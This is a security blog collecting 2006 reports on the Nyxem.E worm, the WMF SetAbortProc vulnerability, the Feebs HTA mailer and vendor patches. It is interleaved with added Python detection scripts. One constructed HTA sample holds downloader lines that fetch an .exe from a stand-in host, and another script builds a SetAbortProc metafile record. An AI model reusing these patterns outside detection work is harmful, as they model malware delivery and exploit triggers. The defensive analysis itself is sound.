The Antivirus Guy Blog

Keeping people up to date with antivirus and security information

SANS – Internet Storm Center – What’s the threat? And who is noticing it? Nyxem_e versus CME 508

 What’s the threat? And who is noticing it? Nyxem_e versus CME 508

Published: 2006-01-22,
Last Updated: 2006-01-22 20:00:45 UTC by Patrick Nolan (Version: 4)

CME 508 does not threaten like Nyxem_e. On February 3rd, and every third day of the month thereafter, Nyxem.E will destroy users’ work (see F-Secure’s blog) when the worm activates and replaces “the content of user’s files with a text string “DATA Error [47 0F 94 93 F4 K5]”. Among these files are: DOC, XLS, MDB, MDE, PPT, PPS, ZIP, RAR, PDF, PSD and DMP” “on all available drives”, and yes, available = shared drives.

FWIW, I look at published email malware statistics daily. Both Nyxem_e and CME 508 are approximately the same in volume reports, and nowhere near what Sober was last year as far as raw numbers go. But Nyxem.E has legs, it’s more like a centipede than a worm, and it’s not likely to drop off the radar soon, certainly not before the 3rd of February.

The Handlers diary previously referenced Nyxem.E in More on Blackmal/Grew/Nyxem (file deletion payload).
Source info – see the F-Secure Virus Information Pages : Nyxem.E

The vendors below do not mention the destruction of user work, as of the checking I just did, YMMV.
Also Known As:

  • WORM_GREW.{A, B} [Trend Micro]
  • W32.Blackmal.E@mm [Symantec]
  • W32/Nyxem-D [Sophos]
  • W32/MyWife.d@MM [McAfee]
  • W32/Grew.A!wm [Fortinet]
  • W32/Small.KI@mm [Norman]
  • Win32/Blackmal.F [Computer Associates]
  • Tearec.A [Panda]

The CME reference is difficult but not impossible to follow. I’m reading CME links which show “Latest CME Identifiers CME-508“, however, that last 508 link has English that says the newest CME-ID is “CME-503 – Date Assigned 2006-01-20”. In any event, I base my comment that “CME-508” is not a threat on the fact that I interpret vendor malware write-ups mentioning CME 503 as the “new” threat called CME-508. The vendors are listing 503; none are using 508 ……

SANS – Internet Storm Center – Cooperative Cyber Threat Monitor And Alert System.


January 23, 2006 | Administrative
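The payload quoted above (files of the listed types overwritten with the string “DATA Error [47 0F 94 93 F4 K5]”) is easy to sweep for after the fact. The following is an added example, not code from the ISC diary or from F-Secure: it walks a directory tree (a mounted share, say), looks only at the extensions the write-up names, and reports every file whose content begins with the marker string. Matching only the first 30 bytes is an assumption made here to keep the scan cheap on large shares; the sample tree it builds under a temporary directory is constructed for the demonstration.

```python
import os
import tempfile

# Marker string the worm writes over user files, per the F-Secure description quoted above.
MARKER = b'DATA Error [47 0F 94 93 F4 K5]'

# File types named in the write-up as targets of the overwrite.
TARGET_EXTS = {'.doc', '.xls', '.mdb', '.mde', '.ppt', '.pps',
               '.zip', '.rar', '.pdf', '.psd', '.dmp'}


def is_overwritten(path):
    """True if the file begins with the marker string (assumption: a prefix
    match is enough, since no real DOC/XLS/PDF/ZIP starts this way)."""
    with open(path, 'rb') as f:
        head = f.read(len(MARKER))
    return head == MARKER


def scan_tree(root):
    """Return sorted, slash-separated paths (relative to root) of trashed files."""
    hits = []
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if os.path.splitext(name)[1].lower() not in TARGET_EXTS:
                continue
            path = os.path.join(dirpath, name)
            try:
                if is_overwritten(path):
                    hits.append(os.path.relpath(path, root).replace(os.sep, '/'))
            except OSError:
                continue  # unreadable file: skip it rather than abort the sweep
    return sorted(hits)


def make_sample_tree():
    """Constructed sample for the demonstration: two trashed files, one
    intact file, and a trashed .txt that is not on the worm's list."""
    root = tempfile.mkdtemp(prefix='nyxem_demo_')
    os.makedirs(os.path.join(root, 'share', 'finance'))
    files = {
        'share/finance/q4.xls': MARKER,
        'share/report.doc': MARKER,
        'share/notes.txt': MARKER,                 # wrong type: must not be reported
        'share/finance/budget.pdf': b'%PDF-1.4 intact content',
    }
    for rel, content in files.items():
        with open(os.path.join(root, *rel.split('/')), 'wb') as f:
            f.write(content)
    return root


if __name__ == '__main__':
    import sys
    root = sys.argv[1] if len(sys.argv) > 1 else make_sample_tree()
    for hit in scan_tree(root):
        print('overwritten:', hit)
```

Run it read-only against each mounted share; the list it produces is also the list of files to pull back from backup, since the original content is gone.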

SANS – Internet Storm Center – New mass mailer spreading (Blackmal/Grew/Nyxem) – With updated info

I have been watching this one since yesterday.  Hopefully the information out there will be clearer now that the AV companies have had time to analyze the virus. F-Secure reports that this virus is already ranked third in their Virus Statistics at the time of this writing, so this is spreading fast.

Symantec now has a cleaner for this virus, which can be found here:

McAfee and F-Secure also have descriptions for this virus, with completely different names.

McAfee: W32/MyWife.d@MM


Trend Micro is also tracking a WORM_NYXEM.E, which may be another variant of this worm, but no details are available as of this writing.

Published: 2006-01-18,
Last Updated: 2006-01-18 03:15:12 UTC by Bojan Zdrnja (Version: 1)

We got several submissions of a new mass mailer worm spreading around. Besides the usual stuff that worms do these days (disable AV programs, scan the local system to find new e-mail addresses), this one is a bit more interesting as the attachment can be either an executable file or a MIME file that contains an executable file.

The sample we received had an attachment named Attachments00.HQX – which is actually just a uuencoded file:

begin 664 Attachments,zip                                      .SCR

You can also see a typical “insert a lot of spaces before the real extension” trick.

Detection of the worm is decent with various AV programs and they remain inconsistent for naming as always (Symantec calls this worm W32.Blackmal.E@mm, Trend Micro calls it WORM_GREW.A, while Sophos calls it W32/Nyxem-D – go figure!).
Seems like we’ll have to wait more for CME.

SANS – Internet Storm Center – Cooperative Cyber Threat Monitor And Alert System.

January 18, 2006 | Antivirus News, Virus Outbreaks
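The Attachments00.HQX sample above is a uuencoded file whose begin line hides the real .SCR extension behind a run of spaces. The following is an added example, not the ISC handlers’ code: it parses the begin line without collapsing the spaces, decodes the body with Python’s binascii, reports the name a user would see against the extension that actually counts, and checks whether the decoded bytes start with the MZ signature of a Windows executable. The message it parses is constructed inline with a zero-filled dummy payload; the attachment name mirrors the one quoted in the diary.

```python
import binascii
import re

# Extensions Windows will execute when the attachment is opened (assumed list).
EXECUTABLE_EXTS = {'.exe', '.scr', '.pif', '.com', '.bat', '.cmd', '.hta'}

# "begin <octal mode> <name>"; the name is everything after the mode, spaces included.
BEGIN_RE = re.compile(r'^begin\s+([0-7]{3,4})\s+(.*)$')


def parse_begin_line(line):
    """Return (mode, filename) from a uuencode begin line, or None."""
    m = BEGIN_RE.match(line.rstrip('\r\n'))
    if not m:
        return None
    return int(m.group(1), 8), m.group(2)


def classify_name(filename):
    """Split an attachment name into the part a user sees, the whitespace run
    that pushes the real extension out of view, and that real extension."""
    stripped = filename.rstrip()
    m = re.search(r'\s{2,}', stripped)
    if m:
        shown, pad, hidden = stripped[:m.start()], m.end() - m.start(), stripped[m.end():]
    else:
        shown, pad, hidden = stripped, 0, ''
    real_ext = ('.' + stripped.rsplit('.', 1)[1]).lower() if '.' in stripped else ''
    stem = stripped[:len(stripped) - len(real_ext)] if real_ext else stripped
    return {
        'shown': shown,
        'pad_spaces': pad,
        'hidden': hidden,
        'real_ext': real_ext,
        # an executable type disguised by padding or by a second extension
        'disguised': real_ext in EXECUTABLE_EXTS and (pad > 0 or '.' in stem),
    }


def decode_uu(text):
    """Decode a uuencoded blob (begin ... end). Returns (filename, bytes)."""
    lines = iter(text.splitlines())
    for line in lines:
        header = parse_begin_line(line)
        if header:
            break
    else:
        raise ValueError('no begin line found')
    out = bytearray()
    for line in lines:
        if line.strip() == 'end':
            break
        if line:
            out += binascii.a2b_uu(line)   # "`" alone decodes to zero bytes
    return header[1], bytes(out)


def triage(text):
    """Decode the attachment and combine the name analysis with a PE check."""
    name, blob = decode_uu(text)
    info = classify_name(name)
    info['filename'] = name
    info['looks_like_pe'] = blob[:2] == b'MZ'
    return info


def build_uu_sample(filename, payload):
    """Construct a uuencoded message for the demonstration (not a worm sample)."""
    lines = ['begin 664 ' + filename]
    for i in range(0, len(payload), 45):
        lines.append(binascii.b2a_uu(payload[i:i + 45]).decode('ascii').rstrip('\n'))
    lines += ['`', 'end']
    return '\n'.join(lines) + '\n'


# Name patterned on the diary's sample; payload is a dummy MZ header, not a program.
SAMPLE_NAME = 'Attachments,zip' + ' ' * 38 + '.SCR'
SAMPLE_MESSAGE = build_uu_sample(SAMPLE_NAME, b'MZ' + b'\x00' * 30)

if __name__ == '__main__':
    print(triage(SAMPLE_MESSAGE))
```

The same name check applies to MIME filename parameters, where the padding trick is just as common; only the decoding step differs.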

SANS – Internet Storm Center – Apple QuickTime and iTunes continued

Apple QuickTime and iTunes continued

Published: 2006-01-14,
Last Updated: 2006-01-14 02:11:18 UTC by Swa Frantzen (Version: 1)
Apple seems to have hit a rough spot in the road with their latest patches.


There are accusations of the software’s main new feature calling home with track and artist names of the files you play. Now of course that’s needed to show related albums for you to buy, but there are a number of questions remaining open. Till then, perhaps it’s better not to have the call home feature if you value privacy or just have too many mp3s …


I have the original upgrade myself and no problem so far, but apparently Apple has recalled it. And they also seem to have published it again. Bottom line: I’m confused. Take care with not updating QuickTime to 7.0.4, as it did patch 8 vulnerabilities. Perhaps that silly joke movie can wait a little longer than getting exploited.

Of course if you produce movies, QuickTime’s functionality might be more important than the security of your browser on the Internet and your risks might be different.

  • For general users, I would urge not to downgrade as you’ll have the vulnerabilities back. Moreover the problems seem to be not that clear. I’m running the initial QuickTime 7.0.4 upgrade and it works just fine.
  • Still, the uninstaller is here should you not be able to continue without the old version.

Before some of our readers think I’m bashing Apple: I’m typing this on a Mac, a Mac I like a lot.
Before some think I love Apple for all they do: I don’t, but that’s another story.

Swa Frantzen

SANS – Internet Storm Center – Cooperative Cyber Threat Monitor And Alert System.

January 14, 2006 | Administrative

Welcome to the Microsoft Security Response Center Blog! : Looking at the WMF issue, how did it get there?

Looking at the WMF issue, how did it get there?

Hi everyone, Stephen Toulouse here. Now that the monthly release has passed and people are deploying the updates I wanted to take a moment to discuss some things related to questions we’ve been receiving on the recent WMF issue. (Which was addressed in MS06-001).

One question we’ve gotten is about SetAbortProc, the function that allows printing jobs to be cancelled. (The link is to the public documentation of the function)

Specifically people are wondering about how the vulnerability was present. Bear with me, I’m going to get rather technical here in the interests of clearly pointing it out. The long story short is that the vulnerability can be triggered with either correct OR incorrect metafile record size values, there seems to have been some confusion on that point.

To detail it a little bit, SetAbortProc functionality was a needed component in the graphics rendering environment for applications to register a callback to cancel printing, before even the WMF file format existed. Remember, those were the days of co-operative multitasking and the only way to allow the user to cancel a print job would be to call back to them, usually via a dialog. Around 1990, WMF support was added to Windows 3.0 as a file-based set of drawing commands for GDI to consume. The SetAbortProc functionality, like all the other drawing commands supported by GDI, was ported over (all in assembly language at this point) by our developers to be recognized when called from a WMF. This was a different time in the security landscape and these metafile records were all completely trusted by the OS. To recap, when it was introduced, the SetAbortProc functionality served an important function.

The vulnerability was introduced when all that GDI functionality was allowed to be called from metafiles. The potential danger of this type of metafile record was recognized and some applications (Internet Explorer, notably) will not process any metafile record of type META_ESCAPE, the overall type of the SetAbortProc record. That restriction is the reason it’s not possible to exploit this vulnerability by simply referencing an image directly in HTML. IE just won’t process it. How then is Internet Explorer an attack vector for the vulnerability? An example of that is through the Windows Picture and Fax Viewer. That application can convert a raw WMF into a printable EMF record. During this conversion, the application will process the META_ESCAPE record. All the current exploits we’re aware of are based on creating an html construct using an IFRAME. At a high level, the IFRAME passes off content to the Windows shell to display. The shell looks up the registered handler for WMF which is the Windows Picture and Fax Viewer (shimgvw.dll) by default. It can run into the vulnerability when converting a raw WMF to a printable EMF if MS06-001 is not applied to the system.

Now, there’s been some speculation that you can only trigger this by using an incorrect size in your metafile record and that this trigger was somehow intentional. That speculation is wrong on both counts. The vulnerability can be triggered with correct or incorrect size values. If you are seeing that you can only trigger it with an incorrect value, it’s probably because your SetAbortProc record is the last record in the metafile. The way this functionality works is by registering the callback to be called after the next metafile record is played. If the SetAbortProc record is the last record in the metafile, it will be more difficult to trigger the vulnerability.

The next question we’ve been getting is around previous operating systems like Windows 98, Windows 98 SE, and Windows Me. Specifically, people are wondering why there is no update available for these platforms. Well, first off, it’s extremely important to note that these products are under an extended support lifecycle. Back in 2004, we made a decision that we would extend support for security updates, for updates rated as Critical only, through June of 2006 for these older operating systems. We publicly posted the policy at the following location:

With WMF we want to be very clear: the Windows 9x platform is not vulnerable to any “Critical” attack vector. The reason Windows 9x is not vulnerable to a “Critical” attack vector is because an additional step exists in the Win9x platform: When not printing to a printer, applications will simply never process the SetAbortProc record. Although the vulnerable code does exist in the Win9x platform, all “Critical” attack vectors are blocked by this additional step. The remaining attack vectors that we have identified require extensive user interaction and are not rated “Critical”. Again the “Critical” rating refers to code execution attacks that could result in automated attacks requiring little or no user interaction.

I’d like to thank the members of the Secure Windows Initiative team for the supplemental research and history on this.

Once again we urge everyone to deploy MS06-001 for the supported platforms, and thanks for the feedback we’ve been getting!


*This posting is provided “AS IS” with no warranties, and confers no rights.*

posted on Friday, January 13, 2006 11:57 PM by stepto

Welcome to the Microsoft Security Response Center Blog! : Looking at the WMF issue, how did it get there?

January 14, 2006 | Security News
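The mechanism the MSRC post above describes, a META_ESCAPE record carrying the SetAbortProc escape, is something a file scanner can look for directly. The following is an added example, not Microsoft’s code and not from the ISC diaries: a small WMF record walker that reports every escape record whose subfunction is SETABORTPROC, notes whether the record’s declared size is plausible (the post stresses that both correct and incorrect sizes trigger the bug, so a scanner must not rely on a bad size), and notes whether another record follows it (the callback fires when the next record is played). The constants come from the WMF format itself (record type META_ESCAPE = 0x0626, escape subfunction SETABORTPROC = 9, placeable-header key 0x9AC6CDD7); the sample files are constructed in the block and carry filler bytes, not a working payload.

```python
import struct

PLACEABLE_KEY = 0x9AC6CDD7   # optional 22-byte "placeable" header in front of the file
META_EOF = 0x0000
META_SETMAPMODE = 0x0103
META_ESCAPE = 0x0626         # record type that passes a GDI escape through
SETABORTPROC = 0x0009        # escape subfunction that registers the abort callback


def build_record(func, params=b''):
    """Encode one record: DWORD size in 16-bit words, WORD function, then params."""
    return struct.pack('<IH', (6 + len(params)) // 2, func) + params


def build_wmf(records):
    """18-byte standard header (Type, HeaderSize=9 words, Version, Size in words,
    NumObjects, MaxRecord, NumMembers) followed by the records. Used for the samples."""
    body = b''.join(records)
    max_words = max(len(r) // 2 for r in records)
    header = struct.pack('<HHHIHIH', 2, 9, 0x0300, (18 + len(body)) // 2, 0, max_words, 0)
    return header + body


def parse_records(data):
    """Walk the record stream. Returns a list of (offset, function, params, size_ok).
    A record whose declared size cannot be right (shorter than its own 6-byte header
    or running past end of file) is reported once with size_ok=False and parsing
    stops, because nothing after it can be located reliably."""
    off = 22 if data[:4] == struct.pack('<I', PLACEABLE_KEY) else 0
    if len(data) < off + 18 or struct.unpack_from('<H', data, off + 2)[0] != 9:
        raise ValueError('not a WMF: bad or missing header')
    off += 18
    records = []
    while off + 6 <= len(data):
        size_words, func = struct.unpack_from('<IH', data, off)
        size = size_words * 2
        if size < 6 or off + size > len(data):
            records.append((off, func, data[off + 6:], False))
            break
        records.append((off, func, data[off + 6:off + size], True))
        if func == META_EOF:
            break
        off += size
    return records


def find_setabortproc(data):
    """Report every META_ESCAPE record whose subfunction is SETABORTPROC, with
    whether its size field was sane and whether a further record follows it."""
    records = parse_records(data)
    findings = []
    for i, (off, func, params, size_ok) in enumerate(records):
        if func != META_ESCAPE or len(params) < 4:
            continue
        escape_func, _byte_count = struct.unpack_from('<HH', params, 0)
        if escape_func == SETABORTPROC:
            followed = i + 1 < len(records) and records[i + 1][1] != META_EOF
            findings.append({'offset': off, 'size_ok': size_ok,
                             'followed_by_record': followed})
    return findings


# Constructed samples; the escape payload is filler, not executable code.
SAMPLE_ABORTPROC = build_wmf([
    build_record(META_ESCAPE, struct.pack('<HH', SETABORTPROC, 4) + b'ABCD'),
    build_record(META_SETMAPMODE, struct.pack('<H', 8)),   # a record after it
    build_record(META_EOF),
])
_bogus = bytearray(SAMPLE_ABORTPROC)
struct.pack_into('<I', _bogus, 18, 0)                      # zero the escape record's size
SAMPLE_BAD_SIZE = bytes(_bogus)
SAMPLE_BENIGN = build_wmf([build_record(META_SETMAPMODE, struct.pack('<H', 8)),
                           build_record(META_EOF)])

if __name__ == '__main__':
    import sys
    for path in sys.argv[1:]:
        with open(path, 'rb') as f:
            print(path, find_setabortproc(f.read()))
```

Because the scanner keys on the escape subfunction rather than on a malformed size, it catches the well-formed variant the post describes as well as the truncated one; files where SetAbortProc is the final record still deserve a look, since the post only says they are harder to trigger, not impossible.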

Slashdot | WMF Vulnerability is an Intentional Backdoor?

WMF Vulnerability is an Intentional Backdoor?

Posted by Zonk on Friday January 13, @12:36PM

from the take-with-a-grain-of-salt

An anonymous reader writes “Steve Gibson alleges that the WMF vulnerability in Windows was neither a bug, nor a feature designed without security in mind, but was actually an intentionally placed backdoor. In more detail, Gibson explains that the way SetAbortProc works in metafiles does not bear even the slightest resemblance to the way it works when used by a program while printing. Based on the information presented, it really does look like an intentional backdoor.” There’s a transcript available of the ‘Security Now!’ podcast where Gibson discusses this.

Slashdot | WMF Vulnerability is an Intentional Backdoor?

January 14, 2006 | Security News

Symantec borrows page from Sony’s book

Symantec revealed this week that they have been using a rootkit-like method, similar to Sony BMG’s rootkit, in Norton SystemWorks 2005 and 2006 to hide a directory involved with protecting items deleted from the Recycle Bin.

The “Norton Protected Recycle Bin” feature that is built in to recent versions of Norton SystemWorks was designed to hide files from the Windows API, just as Sony BMG’s rootkit did, in a directory called “NProtect” that could be used to recover deleted Recycle Bin files. This was supposed to prevent users from accidentally deleting these files while cleaning up their PC.

After being warned by security experts, Mark Russinovich and researchers at antivirus vendor F-Secure, that hiding this directory could give attackers a great hiding place for infected programs, Symantec made an update for this issue that is downloadable from LiveUpdate.

Even though this vulnerability is considered to be low risk, Symantec is “strongly” recommending that SystemWorks users update their product immediately to ensure the greatest protection from threats in the future.

What to do: Even though virus definitions are handled automatically by Symantec LiveUpdate in default configurations of SystemWorks 2005/2006, you have to manually run LiveUpdate to get updates to the product itself. To do this, open Norton SystemWorks (usually found on the desktop or in the Start Menu), then open LiveUpdate, and run LiveUpdate until all available Symantec product updates have been installed. These updates might require multiple reboots, depending on how many updates your installation needs.

More information: eWeek, ZDNet, Secunia

January 14, 2006 | Security News

From the Internet Storm Center – CERTs warn about old java bug being exploited

CERTs warn about old java bug being exploited

Published: 2006-01-13,
Last Updated: 2006-01-13 19:08:06 UTC by Swa Frantzen (Version: 3)

warn about a bug in Java being exploited. They claim the bug was made public in November 2005.

Aside from the obvious “patch” and “turn off Java support”, the warnings include text such as “avoid clicking on any links in emails or instant messages, unless the email was already expected beforehand” and “by only accessing Java applets from known and trusted sources the chances of exploitation are reduced.”

To the best of my knowledge the general user population expects email. They use email to communicate with people they never met before. And they will click on anything in it. Similarly they call it “surfing the web”: they will click on links that lead to other sites. Telling them not to do that is going to have as much effect as asking them not to laugh at you. There are unfortunately only a very few exceptions where you might have users and applications where you can limit the exposure. But as a general recommendation it is rather worthless IMHO.

So download that latest greatest Java environment now if you haven’t done so already and upgrade. Better yet: check those browser settings and turn Java off for all sites that you either do not trust 100% to execute code on your machines or that don’t absolutely need it to work.

We have been informed multiple times that the hostile Java seems to be at a webserver at fullchain [dot] net. Might be interesting to check your logs in a corporate environment. The supposedly hostile code is still there so we won’t be providing detailed URLs for now. The class file on that website is not detected as malicious by any anti-virus product participating in VirusTotal.

Vince told us it’s also necessary to remove the old Java environments, not just get the new ones, as an attacker can target the old environments when they are still
According to the bulletins you need at least

  • Version 1.3.1_16 or later
  • Version 1.4.2_09 or later
  • Version (1.)5 update 4 or later


January 14, 2006 | Security News

SANS – Internet Storm Center – New email virus making the rounds

Handler’s Diary January 11th

New email virus making the rounds

Published: 2006-01-11,
Last Updated: 2006-01-11 22:28:25 UTC by Daniel Wesemann (Version: 1)

We are currently analyzing a copy of .. something. Attachment name “”, detection by AV is still thin to nonexistent. When run, the code tries to pull additional files from web servers in Russia, so if you have a chance, you might consider blocking the following TLDs on your proxy / / / / /

2200 UTC: contains a file named “Secure E-mail File.hta”, which is, according to current VirusTotal output, only detected by Panda and Kaspersky; the latter calls it Worm.Win32.Feebs.k. Samples we’ve seen come in an email with subject “Secure Message from user”. The HTA file is nicely obfuscated: it has 2 obfuscation functions, one being easy unescape, while the other one is a bit more complex. Once it is executed by a user, it will run in the local zone, so it can use various ActiveXObjects. It will try to download executables from 5 web sites (domains listed above), all of which are up and working at this

MD5 sums for the original exploit file and the two variants of
EXEs it downloads when run:
Secure E-mail File.hta


Analysis and write-up by fellow handler Bojan Zdrnja. Thanks! 🙂

SANS – Internet Storm Center – Cooperative Cyber Threat Monitor And Alert System

January 14, 2006 | Antivirus News, Virus Outbreaks
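The diary above describes the Feebs HTA as wrapped in two obfuscation functions, one of them plain unescape, and says the decoded script runs in the local zone and uses ActiveXObjects to fetch executables from several sites. The following is an added example, not the handlers’ code: a Python equivalent of JavaScript’s unescape() applied repeatedly until the text stops changing, followed by a scan of the result for ActiveXObject ProgIDs and URLs. It handles only the unescape layer; the second, more complex function the diary mentions is not reproduced. The HTA it analyses is constructed here (the object names and the example.invalid URL are stand-ins chosen for the demonstration, not indicators from the real sample).

```python
import re

_ESC_RE = re.compile(r'%u([0-9A-Fa-f]{4})|%([0-9A-Fa-f]{2})')


def js_unescape(s):
    """Python equivalent of JavaScript's unescape(): %XX becomes the character
    with code XX, %uXXXX the UTF-16 code unit XXXX; anything else is left alone."""
    def repl(m):
        return chr(int(m.group(1) or m.group(2), 16))
    return _ESC_RE.sub(repl, s)


def peel_unescape_layers(script, max_layers=8):
    """Apply unescape() until the text stops changing. Returns (decoded, layers)."""
    layers = 0
    while layers < max_layers:
        decoded = js_unescape(script)
        if decoded == script:
            break
        script, layers = decoded, layers + 1
    return script, layers


ACTIVEX_RE = re.compile(r'new\s+ActiveXObject\(\s*["\']([^"\']+)["\']', re.I)
URL_RE = re.compile(r'https?://[^\s"\'<>)]+', re.I)


def triage_hta(text):
    """Strip unescape layers, then list the ActiveX ProgIDs and URLs that appear."""
    decoded, layers = peel_unescape_layers(text)
    return {
        'layers': layers,
        'activex': sorted(set(ACTIVEX_RE.findall(decoded))),
        'urls': sorted(set(URL_RE.findall(decoded))),
        'decoded': decoded,
    }


def js_escape(s):
    """Inverse of js_unescape; used only to build the constructed sample below."""
    return ''.join(
        c if c.isalnum() else ('%%%02X' % ord(c) if ord(c) < 256 else '%%u%04X' % ord(c))
        for c in s)


# Constructed sample HTA (not the Feebs file): the object-creation lines of a
# downloader, hidden behind two unescape() layers. Names and URL are stand-ins.
_INNER = (
    'var h = new ActiveXObject("MSXML2.XMLHTTP");\n'
    'h.open("GET", "http://example.invalid/one.exe", false);\n'
    'var s = new ActiveXObject("ADODB.Stream");\n'
    'var w = new ActiveXObject("WScript.Shell");\n'
)
SAMPLE_HTA = (
    '<html><head><script language="javascript">\n'
    'eval(unescape(unescape("' + js_escape(js_escape(_INNER)) + '")));\n'
    '</script></head></html>\n'
)

if __name__ == '__main__':
    report = triage_hta(SAMPLE_HTA)
    print('unescape layers removed:', report['layers'])
    print('ActiveX objects:', report['activex'])
    print('URLs:', report['urls'])
```

Decoding to a fixed point rather than a fixed count matters: nested unescape() calls are common, and the script is only readable once every layer is gone. When the decoded text still contains a custom decoder, that is the second function the diary refers to and it has to be handled by hand.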

SANS – Internet Storm Center – Quicktime patches for Mac and Windows

Handler’s Diary January 10th 2006

Quicktime patches for Mac and Windows
Published: 2006-01-10,
Last Updated: 2006-01-10 20:55:19 UTC by Kyle Haugsness (Version: 1)

Is Apple hiding behind Microsoft’s advisories? Seems like Apple has been conveniently releasing security advisories on the same day as Microsoft’s. Conspiracy theory? You be the judge.

Anyway, Apple released a security update to QuickTime. Multiple vulnerabilities are patched. To summarize the advisory: a maliciously-crafted GIF/TIFF/TGA/QTIF image or multimedia file may result in arbitrary code execution. Well that pretty much covers the whole web browsing

Given the week we’ve had, I suppose that everyone should go back to using netcat for surfing the web.

Update (from Scott):

For those using QuickTime on Windows, a quick note about the versions of QuickTime available to download at . As of 5:30 UTC, the default installer you download includes iTunes. The version of QuickTime included is 7.0.3, which is vulnerable per the advisory above. However, if you download the standalone installer located at , then you get the updated version of QuickTime 7.0.4.

Additionally, if you try to update the software using the “Update existing software…” item under the Help menu, then you receive a message about not being able to make an Internet connection to the software server. I receive the same message if I use the update message under the QuickTime settings window. Not sure if this is an odd configuration problem on my end, or if their update server is having
SANS – Internet Storm Center – Cooperative Cyber Threat Monitor And Alert System

January 14, 2006 | Security News


Important Information for Thursday 5 January 2006

Microsoft announced that it would release a security update to help protect customers from exploitation of a vulnerability in the Windows Metafile (WMF) area of code in the Windows operating system on Tuesday, January 2, 2006, in response to malicious and criminal attacks on computer users that were discovered last week.

Microsoft will release the update today on Thursday, January 5, 2006, earlier than planned.

Microsoft originally planned to release the update on Tuesday, January 10, 2006 as part of its regular monthly release of security bulletins, once testing for quality and application compatibility was complete.
However, testing has been completed earlier than anticipated and the update is ready for release.

In addition, Microsoft is releasing the update early in response to strong customer sentiment that the release should be made available as soon as possible.

Microsoft’s monitoring of attack data continues to indicate that the attacks are limited and are being mitigated both by Microsoft’s efforts to shut down malicious Web sites and with up-to-date signatures from anti-virus companies.

The security update will be available at 2:00 pm PT as MS06-001.

Enterprise customers who are using Windows Server Update Services will receive the update automatically. In addition, the update is supported by Microsoft Baseline Security Analyzer 2.0, Systems Management Server, and Software Update Services. Enterprise customers can also manually download the update from the Download Center.

Microsoft will hold a special Web cast on Friday, January 6, 2006, to provide technical details on MS06-001 and to answer questions.
Registration details will be available at

Microsoft will also be releasing additional security updates on Tuesday, January 10, 2006 as part of its regularly scheduled release of security updates.

What is this alert?

As part of the monthly security bulletin release cycle, Microsoft provides advance notification to our customers on the number of new security updates being released, the products affected, the aggregate maximum severity and information about detection tools relevant to the update. This is intended to help our customers plan for the deployment of these security updates more effectively.

In addition, to help customers prioritize monthly security updates with any non-security updates released on Microsoft Update, Windows Update, Windows Server Update Services and Software Update Services on the same day as the monthly security bulletins, we also provide:

*    Information about the release of updated versions of the Microsoft Windows Malicious Software Removal Tool.
*    Information about the release of NON-SECURITY, High Priority updates on Microsoft Update (MU), Windows Update (WU), Windows Server Update Services (WSUS) and Software Update Services (SUS). Note that this information will pertain ONLY to updates on Windows Update and only about High Priority, non-security updates being released on the same day as security updates. Information will NOT be provided about non-security updates released on other days.

On 10 January 2006 Microsoft is planning to release:

Security Updates
*    1 Microsoft Security Bulletin affecting Microsoft Windows. The highest Maximum Severity rating for these is Critical. These updates may require a restart. These updates will be detectable using the Microsoft Baseline Security Analyzer (MBSA).
*    1 Microsoft Security Bulletin affecting Microsoft Exchange and Microsoft Office. The highest Maximum Severity rating for these is Critical. These updates may require a restart. These updates will be detectable using the Microsoft Baseline Security Analyzer (MBSA).

Microsoft Windows Malicious Software Removal Tool
*    Microsoft is planning to release an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services and the Download Center. Note that this tool will NOT be distributed using Software Update Services (SUS).

Non-security High Priority updates on MU, WU, WSUS and SUS
*    Microsoft is planning to release 1 NON-SECURITY High-Priority Update on Windows Update (WU) and Software Update Services (SUS).
*    Microsoft is planning to release 3 NON-SECURITY High-Priority Updates on Microsoft Update (MU) and Windows Server Update Services (WSUS).

Although we do not anticipate any changes, the number of bulletins, products affected, restart information and severities are subject to change until released.

Microsoft will host a webcast next week to address customer questions on these bulletins. For more information on this webcast please see below:
*    TechNet Webcast: Information about Microsoft’s Security Bulletins (Level 100)
*    Wednesday, January 11, 2006 11:00 AM (GMT-08:00) Pacific Time (US & Canada)

At this time no additional information on these bulletins, such as details regarding severity or details regarding the vulnerability, will be made available until 10 January 2006.

January 5, 2006 | Antivirus News, Security News